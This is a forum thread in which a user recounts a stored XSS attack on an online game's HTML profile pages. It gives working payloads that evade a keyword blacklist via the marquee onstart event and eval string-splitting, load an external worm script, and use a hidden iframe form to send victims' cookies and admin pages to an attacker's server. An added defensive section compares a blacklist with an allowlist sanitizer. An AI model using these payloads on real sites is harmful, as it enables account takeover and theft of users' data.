My experiences on XSS


Post by Rahiel on Mon Jan 11, 2010 12:36 pm

I'd like to share my findings when playing (read: hacking) a web-based mmorpg. (please see http://www.hackthissite.org/forums/viewtopic.php?f=9&t=4574 for an idea for my own mmo).

The game allowed users to have an HTML-enabled profile. The administrator (quite a moron) tried hard to disable any JavaScript, but failed miserably. It blocked words like script and document, and DOM events like onmouseover, among other things. Funnily enough, just a few DOM events were blocked, but by no means all of them. This is a common mistake, because you'd need to include possible events from every browser's developer pages. There are a lot of them and new ones might be introduced with new releases. Anyway, I managed to execute my JavaScript using the HTML <marquee> element and its "onstart" event:
Code:
<marquee id="thing" onstart="alert('sometext')"></marquee>


The next problem that arose was the blocking of words like alert, window and document, which are important in writing JavaScript code. This was easily solved using the eval() function, which wasn't blocked!
Code:
<marquee id="thing" onstart="eval('ale'+'rt(\'sometext\')')"></marquee>

eval() interprets a string as JavaScript code, so this way you can bypass the replace functions of the website.

You can imagine that it'd become quite a mess if you wanted to put a whole worm in one eval function, while replacing every 'document' and such with 'docu'+'ment'. The simple solution is inserting your code from an external webserver. You can't do this using an XMLHttpRequest because it doesn't allow requests to other domains, but you CAN simply insert a <script> tag into the page. (I really don't understand why browsers limit XMLHttpRequest when you can easily do requests some other way...) The final code becomes:
Code:
<marquee id="thing" onstart="eval('e=win'+'dow.docu'+'ment.createElement(\'scr'+'ipt\');e.setAttribute(\'src\',\'http://yourexternalserver.com/worm.js\');win'+'dow.docu'+'ment.body.appendChild(e);')"></marquee>


This gives you an awful lot of opportunities. You can gather any information from other users you shouldn't know (among it user info and cookies, which would allow you to take over their account, as long as the website doesn't check the IP address) and pass it on to an external webserver. Again, XMLHttpRequest doesn't work, but again there's a simple solution:
Code:
var iframe = window.document.createElement('iframe');
iframe.setAttribute('scrolling', 'no');
iframe.setAttribute('width', '0');
iframe.setAttribute('height', '0');
iframe.setAttribute('frameBorder', '0');
window.document.body.appendChild(iframe);
iframe.contentWindow.document.write('<form action="http://yourexternalserver.com/gatherinfo.php" id="form" method="post"><textarea id="juice" name="juice"></textarea></form>');
iframe.contentWindow.document.getElementById('juice').innerHTML = juice;
iframe.contentWindow.document.getElementById('form').submit();

'juice' is of course the information you want to pass on ;). The options of the iframe are set to no width, border or scrollbars so the victim doesn't notice anything. In my case I needed to perform a POST using a form because I wanted to pass on whole pages of the admin area (in case an admin looked at my profile), but if you don't need to transmit a lot of data you can simply use a GET request by setting the src of the iframe to your external server.

You could also make the victim do some POST requests (for example giving money to you) or even create a worm like Samy did: http://en.wikipedia.org/wiki/Samy_%28XSS%29

So what should you do to prevent all this if users are allowed to have an HTML-enabled profile page? If you try to disable JavaScript like the admin of this game and MySpace (Samy) did, you might fail miserably. You could place profile pages on another domain so XMLHttpRequests can't do any harm, but as seen in this post that can also be bypassed. I recommend just disallowing HTML and trying hard to block HTML in all user inputs.
Rahiel
Posts: 16
Joined: Fri May 09, 2008 2:55 pm
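An added example, not code from the original post or from the game it describes, contrasting the two approaches this thread touches on: a word-blacklist filter of the kind the post defeats, and an allowlist sanitizer that keeps only named tags and attributes and escapes everything else, which is the practical middle ground between "allow HTML profiles" and the "disallow HTML entirely" the post recommends. The blacklist word list, the tag/attribute allowlist and the test inputs are my own constructions; the first test input is the marquee/onstart payload quoted in the post. The regex tokenizer illustrates the principle; a production system should use a maintained sanitizer library (DOMPurify in the browser, or a server-side equivalent) that handles the HTML parsing quirks this one does not.

```javascript
// Added example (not from the original post): a word blacklist versus an allowlist sanitizer.

// --- 1. Blacklist filter, modelled on what the post describes ---
// Removes a handful of "dangerous" words. Anything not on the list, such as the
// marquee element's onstart handler, eval, or 'ale'+'rt', passes through untouched.
const BLACKLIST = ['script', 'document', 'window', 'alert', 'onmouseover', 'onclick', 'onload'];

function blacklistFilter(html) {
  let out = html;
  for (const word of BLACKLIST) {
    out = out.split(word).join('');
  }
  return out;
}

// --- 2. Allowlist sanitizer ---
// Only the tags named here survive, and only the attributes listed for each tag.
// Every other tag is escaped to literal text and every other attribute (all on*
// handlers, style, id) is dropped, so there is no list of forbidden names to maintain.
const ALLOWED = {
  b: [], i: [], u: [], p: [], br: [], em: [], strong: [],
  a: ['href'],
};

function escapeHtml(text) {
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// Links may only use http(s); javascript:, data: and relative URLs are rejected.
function safeUrl(value) {
  const url = value.trim();
  return /^https?:\/\//i.test(url) ? url : null;
}

// Matches one tag: optional '/', the tag name, then everything up to the next '>'.
// A '>' inside a quoted attribute value ends the match early; the remainder is then
// escaped as text, which fails in the safe direction.
const TAG_RE = /<\s*(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
// Matches one attribute: a name, then an optional quoted or bare value.
const ATTR_RE = /([^\s=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

function sanitize(html) {
  let out = '';
  let last = 0;
  TAG_RE.lastIndex = 0;
  let m;
  while ((m = TAG_RE.exec(html)) !== null) {
    out += escapeHtml(html.slice(last, m.index)); // text between tags
    last = TAG_RE.lastIndex;
    const closing = m[1] === '/';
    const name = m[2].toLowerCase();
    // hasOwnProperty rather than ALLOWED[name]: a tag named "constructor" or
    // "toString" would otherwise find an inherited Object.prototype member.
    if (!Object.prototype.hasOwnProperty.call(ALLOWED, name)) {
      out += escapeHtml(m[0]); // unknown tag: rendered as literal text
      continue;
    }
    if (closing) {
      out += `</${name}>`;
      continue;
    }
    let attrs = '';
    ATTR_RE.lastIndex = 0;
    let a;
    while ((a = ATTR_RE.exec(m[3])) !== null) {
      const attrName = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      if (!ALLOWED[name].includes(attrName)) continue; // drops every on*, id, style, ...
      if (attrName === 'href') {
        const url = safeUrl(value);
        if (url !== null) attrs += ` href="${escapeHtml(url)}"`;
      }
    }
    out += `<${name}${attrs}>`;
  }
  out += escapeHtml(html.slice(last)); // trailing text
  return out;
}

// The marquee/onstart payload quoted in the post above, used here only as a test input.
const POST_PAYLOAD = String.raw`<marquee id="thing" onstart="eval('ale'+'rt(\'sometext\')')"></marquee>`;

console.log('blacklist :', blacklistFilter(POST_PAYLOAD)); // unchanged: nothing on the list matched
console.log('allowlist :', sanitize(POST_PAYLOAD));        // fully escaped: no tag survives
console.log('allowlist :', sanitize('<b onstart="x">hi</b> <a href="javascript:alert(1)">y</a>'));
```

The point the two outputs make is the one the post makes in prose: the blacklist has to anticipate every element, event and spelling an attacker can use, while the allowlist only has to name the handful of things the profile page actually needs; everything it has never heard of is inert text by default.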


Re: My experiences on XSS

Post by c0cytus on Thu Mar 25, 2010 9:17 am

Thank you, Rahiel!

It's well written and good material for a little case study.
c0cytus
Posts: 1
Joined: Fri Jul 24, 2009 3:24 am


Re: My experiences on XSS

Post by sanddbox on Thu Mar 25, 2010 2:56 pm

Why not redirect them to a shock site? The simple things are the most beautiful.
sanddbox
Posts: 2337
Joined: Sat Jul 04, 2009 5:20 pm

